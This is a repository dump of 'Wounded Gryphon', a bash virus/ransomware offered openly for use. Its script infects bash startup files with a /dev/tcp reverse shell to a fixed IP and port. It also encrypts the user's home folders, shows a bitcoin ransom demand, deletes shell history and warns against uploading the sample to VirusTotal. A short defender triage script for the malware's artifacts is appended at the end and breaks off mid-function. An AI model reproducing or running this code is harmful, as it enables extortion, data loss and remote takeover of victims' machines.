├── requirements.txt ├── _config.yml ├── LICENSE ├── README.md └── WoundedGryphon.sh /requirements.txt: -------------------------------------------------------------------------------- 1 | ccrypt 2 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-hacker -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Don Corleone 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Wounded-Gryphon 2 | 3 | [![Contributions Welcome](https://img.shields.io/badge/contributions-welcome-red.svg?style=round)](https://github.com/MalDev101/WoundedGryphon/issues/) 4 | [![GitHub stars](https://img.shields.io/github/stars/MalDev101/WoundedGryphon.svg?style=social&label=Star&maxAge=2592000)](https://github.com/MalDev101/WoundedGryphon/stargazers) 5 | 6 | 7 | A virus/ransomware written in bash by @Da2dalus. 8 | 9 | ## Run 10 | 11 | *sudo chmod 755 WoundedGryphon.sh* 12 | 13 | *sudo ./WoundedGryphon.sh [option]* 14 | 15 | ## Options 16 | 17 | *Show help page: --help* 18 | 19 | 20 | *Infect all bash files on the system: --infect* 21 | 22 | 23 | *Encrypt files in Desktop, Videos ...: --encrypt* 24 | 25 | 26 | *Self destruct when done: (--infect, --encrypt) --self-destruct* 27 | 28 | *Unencrypt files: --unencrypt* 29 | 30 | 31 | *Uninfect system: --uninfect* 32 | 33 | *Show random banner: --banner* 34 | 35 | ## Checklist 36 | 37 | * [x] Encrypt files 38 | * [x] Banner function 39 | * [x] Infect bash files 40 | * [ ] Infect python files 41 | * [ ] Infect ELF files 42 | * [x] Self destruct option 43 | * [x] Color output 44 | * [x] Unencrypt and uninfect command 45 | -------------------------------------------------------------------------------- /WoundedGryphon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # # 4 | # __ __ \ .___ .___ 5 | # / \ / \____ \_ __ ____ __| _/____ __| _/ --------- 6 | # \ \/\/ / _ \| | \/ \ / __ _/ __ \ / __ | ----------- 7 | # \ ( <_> | | | | / /_/ \ ___// /_/ | ------------ 8 | # \__/\ / \____/|____/|___| \____ |\___ \____ | ----------- 9 | # _____\/ \/ __ \/ \/ \/ ---------- 10 | # / ___ \_______ ___.________ | |__ ____ ____ --------- 11 | # / \ __\_ __ < | \____ \| | \ / _ \ / \ ---------- 
12 | # \ \_\ | | \/\___ | |_> | Y ( <_> | | \ ---------- 13 | # \______ |__| / ____| __/|___| /\___\/|___| / ---------- 14 | # / \/ \/ |__| \/ \ \/ --------- 15 | # / Wonded Gryphon v4.3 ______----------- # --------------- 16 | # # _______,---'__,---' --------------------------- 17 | # _,-'---_---__,---' ----------------------------- 18 | # /_ # (, ---____', -------------------------------- 19 | # / /,, `, ,-' ------------------------------------- 20 | # ;/) ,',,_/,' # ------------------------------------- 21 | # | /\ ,.'//\ / --------------------------------------- 22 | # `-` \ ,,' /. # ------------------------------------- 23 | # `', ,-- `./ ----------------------------------------- 24 | # '/ / | /`, ----------------------------------------- 25 | # //'',.\_ .\\ -----,{==>- ------------------------------ 26 | # __// __;_`- \ `;.__,;' ------------------------------------ 27 | # ((,--,) (((,------; `--' -------------------------------------- 28 | # 29 | # Created by Da2dalus a MalDev101 project 30 | # This is only an experiment but it can be dangerous. 31 | # I am not responsible for the damage. 32 | # This is a virus/ransomware that works on unix systems with bash installed. 33 | # Tested on Linux (Ubuntu, Debian) 34 | 35 | SHEBANG="#!/bin/bash" 36 | 37 | ME="$0" 38 | 39 | CAT=$(cat "$ME") 40 | 41 | VERSION="v4.3" 42 | 43 | OFLAG="$1" 44 | 45 | # Configuration -------------------------------------------------------------------------------------------------------------# 46 | 47 | # Virus mode configuration ----------------------------------------------------$ 48 | 49 | FLAG="#arrow" 50 | 51 | # ------------------------------------------------------------------> 52 | 53 | # String you want to append to sh file. Example: reverse tcp bash (metasploit). 
54 | # Responds to: 55 | # IP: 192.168.1.88 56 | # PORT: 8888 57 | 58 | PAYLOAD="0<&205-;exec 205<>/dev/tcp/192.168.1.88/8888;sh <&205 >&205 2>&205" # Choose payload when infecting 59 | 60 | # -------------------------------------------------------------------> 61 | 62 | MAXINFECTCOUNT=50 # Maximum infected files 63 | 64 | # ------------------------------------------------------------------------------$ 65 | 66 | # Ransomware mode configuration ------------------------------------------------$ 67 | 68 | KEY="GrYpHoN" # KEY 69 | 70 | CCRYPT="/bin/ccrypt" 71 | 72 | # ------------------------------------------------------------------------------$ 73 | 74 | # ----------------------------------------------------------------------------------------------------------------------------# 75 | 76 | # Colors and special caracters 77 | 78 | # Reset 79 | NC='\033[0m' # Text Reset 80 | 81 | BLINK=$(tput blink) 82 | 83 | # Regular Colors 84 | Black='\033[0;30m' # Black 85 | Red='\033[0;31m' # Red 86 | Green='\033[0;32m' # Green 87 | Yellow='\033[0;33m' # Yellow 88 | Blue='\033[0;34m' # Blue 89 | Purple='\033[0;35m' # Purple 90 | Cyan='\033[0;36m' # Cyan 91 | White='\033[0;37m' # White 92 | 93 | # Bold 94 | BBlack='\033[1;30m' # Black 95 | BRed='\033[1;31m' # Red 96 | BGreen='\033[1;32m' # Green 97 | BYellow='\033[1;33m' # Yellow 98 | BBlue='\033[1;34m' # Blue 99 | BPurple='\033[1;35m' # Purple 100 | BCyan='\033[1;36m' # Cyan 101 | BWhite='\033[1;37m' # White 102 | 103 | # Underline 104 | UBlack='\033[4;30m' # Black 105 | URed='\033[4;31m' # Red 106 | UGreen='\033[4;32m' # Green 107 | UYellow='\033[4;33m' # Yellow 108 | UBlue='\033[4;34m' # Blue 109 | UPurple='\033[4;35m' # Purple 110 | UCyan='\033[4;36m' # Cyan 111 | UWhite='\033[4;37m' # White 112 | 113 | # Background 114 | On_Black='\033[40m' # Black 115 | On_Red='\033[41m' # Red 116 | On_Green='\033[42m' # Green 117 | On_Yellow='\033[43m' # Yellow 118 | On_Blue='\033[44m' # Blue 119 | On_Purple='\033[45m' # Purple 120 | 
On_Cyan='\033[46m' # Cyan 121 | On_White='\033[47m' # White 122 | 123 | # High Intensity 124 | IBlack='\033[0;90m' # Black 125 | IRed='\033[0;91m' # Red 126 | IGreen='\033[0;92m' # Green 127 | IYellow='\033[0;93m' # Yellow 128 | IBlue='\033[0;94m' # Blue 129 | IPurple='\033[0;95m' # Purple 130 | ICyan='\033[0;96m' # Cyan 131 | IWhite='\033[0;97m' # White 132 | 133 | # Bold High Intensity 134 | BIBlack='\033[1;90m' # Black 135 | BIRed='\033[1;91m' # Red 136 | BIGreen='\033[1;92m' # Green 137 | BIYellow='\033[1;93m' # Yellow 138 | BIBlue='\033[1;94m' # Blue 139 | BIPurple='\033[1;95m' # Purple 140 | BICyan='\033[1;96m' # Cyan 141 | BIWhite='\033[1;97m' # White 142 | 143 | # High Intensity backgrounds 144 | On_IBlack='\033[0;100m' # Black 145 | On_IRed='\033[0;101m' # Red 146 | On_IGreen='\033[0;102m' # Green 147 | On_IYellow='\033[0;103m' # Yellow 148 | On_IBlue='\033[0;104m' # Blue 149 | On_IPurple='\033[0;105m' # Purple 150 | On_ICyan='\033[0;106m' # Cyan 151 | On_IWhite='\033[0;107m' # White 152 | 153 | # List made by Shakiba Moshiri 154 | 155 | # All the BANNERS 156 | 157 | function banner1() { 158 | 159 | echo -e "$Blue _ # _ $NC" 160 | echo -e "$Blue _/| \ _ |\_ $NC" 161 | echo -e "$Blue _/_ | \|\\ | _\ $NC" 162 | echo -e "$Blue _/_/| / / \|\ |\_\_ # $NC" 163 | echo -e "$Blue _/_/ |/ / _ \/\| \_\_ / $NC" 164 | echo -e "$Blue _/_/ || | | \*/ || \_\/ $NC" 165 | echo -e "$Blue /_/ | | |\ | \_ / /| | | \_\ # $NC" 166 | echo -e "$Blue // ||| | \_/ \__/ | ||| \\ / $NC" 167 | echo -e "$Blue // __| ||\ \ || || / /|| |__ \/ $NC" 168 | echo -e "$Blue //_/ \|||| \/\\|| ||//\/ ||||/ \_\\ $NC" 169 | echo -e "$Blue /// \\\\/ /() ()\ \//// \\\ $NC" 170 | echo -e "$Blue |/ \/ | | | \/ \| $NC" 171 | echo -e "$Blue /_| | |_ \ # $NC" 172 | echo -e "$Blue ///_| |_||\_ \/ $NC" 173 | echo -e "$Blue |//||/||\/||\/ WOUNDED GRYPHON $VERSION $NC" 174 | echo -e "$Blue / || ||/||/\/ $NC" 175 | echo -e "$Blue {}/|| {} $NC" 176 | echo -e "$Blue || $NC" 177 | echo -e "$Blue () $NC" 178 | } 
179 | 180 | function banner2() { 181 | 182 | echo -e "$BLINK $Cyan 183 | ++01100101 01110101++ =ඏ= ++10101110 10100110++ 184 | +011100110110 01001111000 0♢0Ŧ0♢0 00011110010 011011001110+ 185 | +0110010001100101 0110000101100100 000卄000 0010011010000110 1010011000100110+ 186 | +01101101011000010111001001101011++00+0卄00++++11010110010011101000011010110110+ 187 | 0111001101100 0010110111001100100 ⁆⁅ 0010011001110110100 0011011001110 188 | 011001100 110000101110010++= ⁆⁅ =++010011101000011 001100110 189 | +01 10100001100101011 10010ʞk01001 11010100110000101 10+ 190 | +0111010001101111 +01ʞk10+ 1111011000101110+ 191 | +110101011011 00.∴.00 110110101011+ 192 | +01100101 0+1ʞk1+0 10100110+ 193 | +1100101 +0+.∴.+0+ 1010011+ 194 | +1110010 +0+.∴.+0+ 0100111+ 195 | +1110100 01 ∴ 10 0010111+ 196 | 10 ∴ 01 197 | 10 ∵ 01 198 | 00.00 199 | : : $NC 200 | $BBlue Do you got what it takes? $NC 201 | $BWhite https://bit.ly/3b83sD9 $NC" 202 | } 203 | 204 | function banner3() { 205 | echo -e " $Cyan 206 | # ------------------------------------------ 207 | __ __ \ -------------- .___ ------- .___ -------- 208 | / \ / \____ \_ __ ____ __| _/____ __| _/ --------- 209 | \ \/\/ / _ \| | \/ \ / __ _/ __ \ / __ | ----------- 210 | \ ( <_> | | | | / /_/ \ ___// /_/ | ------------ 211 | \__/\ / \____/|____/|___| \____ |\___ \____ | ----------- 212 | _____\/ \/ __ \/ \/ \/ ---------- 213 | / ___ \_______ ___.________ | |__ ____ ____ --------- 214 | / \ __\_ __ < | \____ \| | \ / _ \ / \ ---------- 215 | \ \_\ | | \/\___ | |_> | Y ( <_> | | \ ---------- 216 | \______ |__| / ____| __/|___| /\___\/|___| / ---------- 217 | / \/ \/ |__| \/ \ \/ --------- 218 | /$NC $BBlue Wonded Gryphon $VERSION $NC $Cyan---------------- # --------------- 219 | # ---------------------------------------------------------- $NC" 220 | } 221 | 222 | function banner4() { 223 | echo -e "$Blue 224 | _________ 225 | / ======= \ 226 | / __________\ 227 | | ___________ | 228 | | | I Love | | 229 | | | BASH | | 230 | | 
|_________| |________________________ 231 | \=____________/ ) 232 | / ........... \ WOUNDED GRYPHON / 233 | / ::::::::::::: \ $VERSION =D-' 234 | (_________________) $NC" 235 | } 236 | 237 | function banner5() { 238 | echo -e "$Red █ █░ ▒█████ █ ██ ███▄ █ ▓█████▄ ▓█████ ▓█████▄ ▄████ ██▀███ ▓██ ██▓ ██▓███ ██░ ██ ▒█████ ███▄ █ $NC"; 239 | echo -e "$Red ▓█░ █ ░█░▒██▒ ██▒ ██ ▓██▒ ██ ▀█ █ ▒██▀ ██▌▓█ ▀ ▒██▀ ██▌ ██▒ ▀█▒▓██ ▒ ██▒▒██ ██▒▓██░ ██▒▓██░ ██▒▒██▒ ██▒ ██ ▀█ █ $NC"; 240 | echo -e "$Red ▒█░ █ ░█ ▒██░ ██▒▓██ ▒██░▓██ ▀█ ██▒░██ █▌▒███ ░██ █▌▒██░▄▄▄░▓██ ░▄█ ▒ ▒██ ██░▓██░ ██▓▒▒██▀▀██░▒██░ ██▒▓██ ▀█ ██▒ $NC"; 241 | echo -e "$Red ░█░ █ ░█ ▒██ ██░▓▓█ ░██░▓██▒ ▐▌██▒░▓█▄ ▌▒▓█ ▄ ░▓█▄ ▌░▓█ ██▓▒██▀▀█▄ ░ ▐██▓░▒██▄█▓▒ ▒░▓█ ░██ ▒██ ██░▓██▒ ▐▌██▒ $NC"; 242 | echo -e "$Red ░░██▒██▓ ░ ████▓▒░▒▒█████▓ ▒██░ ▓██░░▒████▓ ░▒████▒░▒████▓ ░▒▓███▀▒░██▓ ▒██▒ ░ ██▒▓░▒██▒ ░ ░░▓█▒░██▓░ ████▓▒░▒██░ ▓██░ $NC"; 243 | echo -e "$Red ░ ▓░▒ ▒ ░ ▒░▒░▒░ ░▒▓▒ ▒ ▒ ░ ▒░ ▒ ▒ ▒▒▓ ▒ ░░ ▒░ ░ ▒▒▓ ▒ ░▒ ▒ ░ ▒▓ ░▒▓░ ██▒▒▒ ▒▓▒░ ░ ░ ▒ ░░▒░▒░ ▒░▒░▒░ ░ ▒░ ▒ ▒ $NC"; 244 | echo -e "$Red ▒ ░ ░ ░ ▒ ▒░ ░░▒░ ░ ░ ░ ░░ ░ ▒░ ░ ▒ ▒ ░ ░ ░ ░ ▒ ▒ ░ ░ ░▒ ░ ▒░▓██ ░▒░ ░▒ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░ ░░ ░ ▒░ $NC"; 245 | echo -e "$Red ░ ░ ░ ░ ░ ▒ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ▒ ▒ ░░ ░░ ░ ░░ ░░ ░ ░ ▒ ░ ░ ░ $NC"; 246 | echo -e "$Red ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ $NC"; 247 | echo -e "$Red ░ ░ ░ ░ $NC"; 248 | 249 | } 250 | 251 | function banner_text() { 252 | 253 | echo -e " $UBlue 254 | 255 | # Created by Da2dalus a MalDev101 project 256 | # This is only an experiment but it can be dangerous. 257 | # I am not responsible for the damage. 258 | # This is a virus/ransomware that works on unix systems with bash installed. 259 | # Tested on Linux (Ubuntu, Debian) and MacOS (OSX) 260 | # $NC 261 | $BBlue# If virus mode: $NC 262 | $UBlue# 263 | # Check if files are written in bash then start infecting them. 
264 | # The virus ignores non bash scripts and already infected files 265 | # $NC 266 | $BBlue# If ransomware mode: $NC 267 | $UBlue# 268 | # Encrypt files in Desktop, Videos ... $NC" 269 | } 270 | 271 | function error() { 272 | 273 | echo -e "$Red $BLINK _______________________________ ________ __________._. $NC" 274 | echo -e "$Red $BLINK \_ _____/\______ \______ \\_____ \\______ \ | $NC" 275 | echo -e "$Red $BLINK | __)_ | _/| _/ / | \| _/ | $NC" 276 | echo -e "$Red $BLINK | \ | | \| | \/ | \ | \\| $NC" 277 | echo -e "$Red $BLINK /_______ / |____|_ /|____|_ /\_______ /____|_ /__ $NC" 278 | echo -e "$Red $BLINK \/ \/ \/ \/ \/ \/ $NC" 279 | 280 | echo -e " " 281 | } 282 | 283 | function helpfunction() { 284 | 285 | echo -e "$BCyan Available opions: $NC" 286 | echo -e " " 287 | echo -e "$UCyan Show this page: --help $NC" 288 | echo -e "$UCyan Infect all bash files on the system: --infect $NC" 289 | echo -e "$UCyan Encrypt files in Desktop, Videos ...: --encrypt $NC" 290 | echo -e "$UCyan Self destruct when done: (--infect, --encrypt) --self-destruct $NC" 291 | echo -e "$UCyan Unencrypt files: --unencrypt $NC" 292 | echo -e "$UCyan Uninfect system: --uninfect $NC" 293 | echo -e "$UCyan Only show random banner: --banner $NC" 294 | 295 | } 296 | 297 | # Cleanup function 298 | 299 | function cleanup() { 300 | 301 | echo "#!/bin/bash" > Gryphon.sh 302 | echo "sleep 8" >> Gryphon.sh 303 | echo "sudo mv $ME /dev/null" >> Gryphon.sh 304 | chmod 755 Gryphon.sh 305 | ./Gryphon 306 | exit 307 | } 308 | 309 | 310 | # Virus mode 311 | 312 | function check() { 313 | 314 | local IFBASH=$(grep -Fx "$SHEBANG" *) 315 | 316 | if [ "$IFBASH" =~ .*"$SHEBANG" ] 317 | 318 | then 319 | 320 | local LISTNOTREADY=$(echo "$IFBASH" | sed 's|:#!/bin/bash||') 321 | local LISTNOTREADYD=$(echo "$LISTNOTREADY" | tr "\n" " ") 322 | local LISTNOTREADY2=$(grep -Fx "$FLAG" "$LISTNOTREADYD") 323 | local LISTNOTREADY2D=$(echo "$LISTNOTREADY2" | sed '/bar/,+1 d') 324 | LIST=$(echo "$LISTNOTREADY2D" | tr 
"\n" " ") 325 | 326 | if [ "$LIST" == "" ] 327 | 328 | then 329 | 330 | foldercheck 331 | 332 | else 333 | 334 | infect 335 | 336 | fi 337 | 338 | else 339 | 340 | foldercheck 341 | 342 | fi 343 | 344 | } 345 | 346 | function foldercheck() { 347 | 348 | local LDIR=$(ls -d *) 349 | 350 | if [ "$LDIR" == "" ] 351 | 352 | then 353 | cd / 354 | 355 | check 356 | 357 | else 358 | 359 | echo "$LDIR" > LIST.txt 360 | 361 | CDDIR=$(shuf -n1 LIST.txt) 362 | 363 | cd "$CDDIR" 364 | 365 | check 366 | fi 367 | } 368 | 369 | # PAYLOAD 370 | 371 | function infect() { 372 | 373 | # String you want to append to sh file. Example: reverse tcp bash (metasploit). 374 | # Responds to: 375 | # IP: 192.168.1.88 376 | # PORT: 8888 377 | 378 | echo "$PAYLOAD" >> "$LIST" 379 | echo "$FLAG" >> "$LIST" 380 | 381 | INFECTCOUNT=$(($INFECTCOUNT + 1)) 382 | 383 | if [ "$INFECTCOUNT" == "$MAXINFECTCOUNT" ] 384 | 385 | then 386 | if grep -q --self-destruct <<<"$@" 387 | 388 | then 389 | echo -e "$BBlue Done...$NC" 390 | cleanup 391 | 392 | else 393 | echo -e "$BBlue Done...$NC" 394 | exit 395 | 396 | fi 397 | 398 | else 399 | check 400 | 401 | fi 402 | 403 | } 404 | 405 | # choose a random banner 406 | 407 | function CHOOSE_BANNER() { 408 | 409 | banners=(banner1 banner2 banner3 banner4 banner5) ; 410 | THECHOSENONE="${banners[RANDOM%${#banners[@]}]}"; 411 | } 412 | 413 | CHOOSE_BANNER 414 | 415 | function BANNER() { 416 | 417 | "$THECHOSENONE" 418 | echo " " 419 | banner_text 420 | } 421 | 422 | # start infecting autostart 423 | 424 | function virus_start() { 425 | 426 | BANNER # Very important :) 427 | 428 | cd /etc/profile.d/ 429 | 430 | check 431 | 432 | } 433 | 434 | # RANSOMWARE MODE 435 | 436 | function ccryptcheck() { 437 | 438 | if [ -f "$CCRYPT" ] 439 | 440 | then 441 | scan 442 | 443 | else 444 | sudo apt install ccrypt -yy 445 | brew install ccrypt 446 | yum install ccrypt 447 | pacman install ccrypt 448 | ccryptcheck 449 | 450 | fi 451 | } 452 | 453 | function encryptvideos() { 454 | 
455 | cd "$HOME" 456 | cd Videos 457 | local LS=$(ls -a) 458 | local LIST=$(echo "$LS" | tr "\n" " ") 459 | ccencrypt "$LIST" -k "$KEY" 460 | for f in *.cpt; do 461 | mv -- "$f" "${f%.cpt}.WOUND" 462 | done 463 | 464 | } 465 | 466 | function encryptdesktop() { 467 | 468 | cd "$HOME" 469 | cd Desktop 470 | local LS=$(ls -a) 471 | local LIST=$(echo "$LS" | tr "\n" " ") 472 | ccencrypt "$LIST" -k "$KEY" 473 | for f in *.cpt; do 474 | mv -- "$f" "${f%.cpt}.WOUND" 475 | done 476 | 477 | } 478 | 479 | function encryptpictures() { 480 | 481 | cd "$HOME" 482 | cd Pictures 483 | local LS=$(ls -a) 484 | local LIST=$(echo "$LS" | tr "\n" " ") 485 | ccencrypt "$LIST" -k "$KEY" 486 | for f in *.cpt; do 487 | mv -- "$f" "${f%.cpt}.WOUND" 488 | done 489 | 490 | } 491 | 492 | function encryptdocuments() { 493 | 494 | cd "$HOME" 495 | cd Documents 496 | local LS=$(ls -a) 497 | local LIST=$(echo "$LS" | tr "\n" " ") 498 | ccencrypt "$LIST" -k "$KEY" 499 | for f in *.cpt; do 500 | mv -- "$f" "${f%.cpt}.WOUND" 501 | done 502 | 503 | } 504 | 505 | function encryptdownloads() { 506 | 507 | cd "$HOME" 508 | cd Downloads 509 | local LS=$(ls -a) 510 | local LIST=$(echo "$LS" | tr "\n" " ") 511 | ccencrypt "$LIST" -k "$KEY" 512 | for f in *.cpt; do 513 | mv -- "$f" "${f%.cpt}.WOUND" 514 | done 515 | 516 | } 517 | 518 | function encryptmusic() { 519 | 520 | cd "$HOME" 521 | cd Music 522 | local LS=$(ls -a) 523 | local LIST=$(echo "$LS" | tr "\n" " ") 524 | ccencrypt "$LIST" -k "$KEY" 525 | for f in *.cpt; do 526 | mv -- "$f" "${f%.cpt}.WOUND" 527 | done 528 | 529 | } 530 | 531 | function ransom_start() { 532 | 533 | BANNER 534 | ccryptcheck 535 | sleep 5 536 | encryptdesktop 537 | sleep 5 538 | encryptdocuments 539 | sleep 5 540 | encryptdownloads 541 | sleep 5 542 | zenity --warning --text="Your files are encrypted by Wounded Gryphon! 
Pay 500$ worth in bitcoin to this bitcoin address: Your Bitcoin Address so you can receive the decrypt instructions" 543 | encryptmusic 544 | sleep 5 545 | encryptpictures 546 | sleep 5 547 | encryptvideos 548 | cd "$HOME" && rm .bash_history 549 | sleep 5 550 | 551 | if grep -q --self-destruct <<<"$@" 552 | 553 | then 554 | echo -e "$BBlue Done...$NC" 555 | cleanup 556 | 557 | else 558 | echo -e "$BBlue Done...$NC" 559 | exit 560 | 561 | fi 562 | 563 | } 564 | 565 | # Uninfect 566 | 567 | function remcheck() { 568 | 569 | local IFBASH=$(grep -Fx "$SHEBANG" *) 570 | 571 | if grep -q "$SHEBANG" <<<"$IFBASH" 572 | 573 | then 574 | 575 | local LISTNOTREADY=$(echo "$IFBASH" | sed 's|:#!/bin/bash||') 576 | local LISTNOTREADYD=$(echo "$LISTNOTREADY" | tr "\n" " ") 577 | local LISTNOTREADY2=$(grep -Fx "$FLAG" "$LISTNOTREADYD") 578 | local LISTNOTREADY2D=$(echo "$LISTNOTREADY2" | sed 's|:#arrow||') 579 | LIST=$(echo "$LISTNOTREADY2D" | tr "\n" " ") 580 | 581 | if [ "$LIST" == "" ] 582 | 583 | then 584 | 585 | remfoldercheck 586 | 587 | else 588 | 589 | uninfect 590 | 591 | fi 592 | 593 | else 594 | 595 | remfoldercheck 596 | 597 | fi 598 | 599 | } 600 | 601 | function remfoldercheck() { 602 | 603 | local LDIR=$(ls -d *) 604 | 605 | if [ "$LDIR" == "" ] 606 | 607 | then 608 | cd / 609 | 610 | remcheck 611 | 612 | else 613 | 614 | echo "$LDIR" > LIST.txt 615 | 616 | CDDIR=$(shuf -n1 LIST.txt) 617 | 618 | cd "$CDDIR" 619 | 620 | remcheck 621 | fi 622 | } 623 | 624 | 625 | function uninfect() { 626 | 627 | sed -i '/"$PAYLOAD"/d' "$LIST" 628 | sed -i '/"$FLAG"/d' "$LIST" 629 | 630 | RINFECTCOUNT=$(($RINFECTCOUNT + 1)) 631 | 632 | if [ "$RINFECTCOUNT" == $MAXINFECTCOUND ] 633 | 634 | then 635 | 636 | if grep -q --self-destruct <<<"$@" 637 | 638 | then 639 | echo -e "$BBlue Done...$NC" 640 | cleanup 641 | 642 | else 643 | echo -e "$BBlue Done...$NC" 644 | exit 645 | 646 | fi 647 | 648 | else 649 | remcheck 650 | 651 | fi 652 | 653 | } 654 | 655 | function uninfectstart() { 656 | 
657 | BANNER # Very important :) 658 | 659 | cd /etc/profile.d/ 660 | 661 | remcheck 662 | 663 | } 664 | 665 | # Unencrypt 666 | 667 | function unencryptvideos() { 668 | 669 | cd "$HOME" 670 | cd Videos 671 | local LS=$(ls -a) 672 | local LIST=$(echo "$LS" | tr "\n" " ") 673 | ccdecrypt "$LIST" -K "$KEY" 674 | } 675 | 676 | function unencryptdesktop() { 677 | 678 | cd "$HOME" 679 | cd Desktop 680 | local LS=$(ls -a) 681 | local LIST=$(echo "$LS" | tr "\n" " ") 682 | ccdecrypt "$LIST" -K "$KEY" 683 | } 684 | 685 | function unencryptpictures() { 686 | 687 | cd "$HOME" 688 | cd Pictures 689 | local LS=$(ls -a) 690 | local LIST=$(echo "$LS" | tr "\n" " ") 691 | ccdecrypt "$LIST" -K "$KEY" 692 | } 693 | 694 | function unencryptdocuments() { 695 | 696 | cd "$HOME" 697 | cd Documents 698 | local LS=$(ls -a) 699 | local LIST=$(echo "$LS" | tr "\n" " ") 700 | ccdecrypt "$LIST" -K "$KEY" 701 | } 702 | 703 | function unencryptdownloads() { 704 | 705 | cd "$HOME" 706 | cd Downloads 707 | local LS=$(ls -a) 708 | local LIST=$(echo "$LS" | tr "\n" " ") 709 | ccdecrypt "$LIST" -K "$KEY" 710 | 711 | } 712 | 713 | function unencryptmusic() { 714 | 715 | cd "$HOME" 716 | cd Music 717 | local LS=$(ls -a) 718 | local LIST=$(echo "$LS" | tr "\n" " ") 719 | ccdecrypt "$LIST" -K "$KEY" 720 | 721 | } 722 | 723 | function unencrypt() { 724 | 725 | BANNER 726 | ccryptcheck 727 | sleep 5 728 | unencryptdesktop 729 | sleep 5 730 | unencryptdocuments 731 | sleep 5 732 | unencryptdownloads 733 | sleep 5 734 | unencryptmusic 735 | sleep 5 736 | unencryptpictures 737 | sleep 5 738 | unencryptvideos 739 | cd "$HOME" && rm .bash_history 740 | sleep 5 741 | 742 | if grep -q --self-destruct <<<"$@" 743 | 744 | then 745 | echo -e "$BBlue Done...$NC" 746 | cleanup 747 | 748 | else 749 | echo -e "$BBlue Done...$NC" 750 | exit 751 | 752 | fi 753 | 754 | } 755 | 756 | # Start 757 | 758 | if [ "$OFLAG" == "--infect" ] 759 | 760 | then 761 | virus_start 762 | 763 | elif [ "$OFLAG" == "--encrypt" ] 764 | 765 
| then 766 | ransom_start 767 | 768 | elif [ "$OFLAG" == "--uninfect" ] 769 | 770 | then 771 | uninfect 772 | 773 | elif [ "$OFLAG" == "--help" ] 774 | 775 | then 776 | helpfunction 777 | 778 | elif [ "$OFLAG" == "--unencrypt" ] 779 | 780 | then 781 | unencrypt 782 | 783 | elif [ "$OFLAG" == "--banner" ] 784 | 785 | then 786 | BANNER 787 | 788 | elif [ $# -le 0 ] 789 | 790 | then 791 | error 792 | echo -e " " 793 | echo -e "$Red No arguments specified! $NC" 794 | echo -e "$Red Use$NC $BRed--help$NC $Red to display options.$NC" 795 | 796 | else 797 | error 798 | echo -e " " 799 | echo -e "$Red No such argument available!$NC" 800 | echo -e "$Red Use$NC $BRed--help$NC $Red to display options.$NC" 801 | 802 | fi 803 | 804 | 805 | # |\ /) 806 | # /\_\\__ (_// 807 | # | `>\-` _._ //`) 808 | # \ /` \\ _.-.---.`-._ // 809 | # ` \|` / \ `|/ 810 | # | \.@-@./ | 811 | # |.../`\_/`\...| 812 | # |::// _ \\::| 813 | # | | \ )|_ | 814 | # \/`\_`> <_/ \/ 815 | # \__/'---'\__/ 816 | # `-. ::: .-' 817 | # //`:::`\\ 818 | # // ' \\ 819 | # |/ \\ 820 | # 821 | # PLEASE DO NOT COPY THE SOURCE CODE OF THIS PROJECT AND RENAME IT 822 | # THAT'S NOT CREATING THAT IS STEALING. 823 | # 824 | # THIS SOFTWARE IS PROTECTED BY A GNU PUBLIC LICENSE 825 | # 826 | # DO NOT UPLOAD THIS SAMPLE ON VIRUS TOTAL TO PREVENT 827 | # ANTI VIRUS DETECTION. 828 | # 829 | # I AND THE TEAM ARE NOT RESPONSIBLE FOR THE DAMAGE CAUSED BY 830 | # THIS SOFTWARE! 831 | # 832 | # THANKS FOR THE PEOPLE WHO ADDET THERE CODE TO THIS PROJECT 833 | # AND SUPPORTED IT 834 | # 835 | # NEW VERSIONS WILL BE COMING SOON (I HOPE) 836 | # 837 | # Greetings from the MalDev101 TEAM 838 | --------------------------------------------------------------------------------
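A defender's triage for the on-disk artifacts this script leaves behind, as an added example that is not part of the repository. The indicator strings (`#arrow`, `.WOUND`, `LIST.txt`, `Gryphon.sh`) are taken from the source above; the function names are hypothetical and the sample tree is constructed and contains no payload. Because `PAYLOAD` is configurable, the marker line is treated as the stable indicator and the line preceding it is reported for review.

```shell
#!/bin/sh
# Added example: triage for artifacts of the script shown above.
# Indicator values come from the page; everything else is illustrative.

MARKER='#arrow'      # FLAG: appended as its own line right after the payload line
ENC_SUFFIX='.WOUND'  # suffix the ccrypt output (*.cpt) is renamed to

# Files that contain the marker as an exact line, plus the line appended
# just before it and whether that line uses a /dev/tcp redirect.
# Output: <file><TAB><net|other><TAB><preceding line>
# Only files under 2 MiB are read (-size counts 512-byte blocks).
scan_markers() {
    find "$1" -type f -size -4096 -exec awk -v m="$MARKER" '
        FNR == 1 { prev = "" }
        $0 == m  { tag = (prev ~ /\/dev\/tcp\//) ? "net" : "other"
                   printf "%s\t%s\t%s\n", FILENAME, tag, prev }
                 { prev = $0 }
    ' {} + 2>/dev/null
}

# Files renamed by the encrypt mode.
scan_encrypted() {
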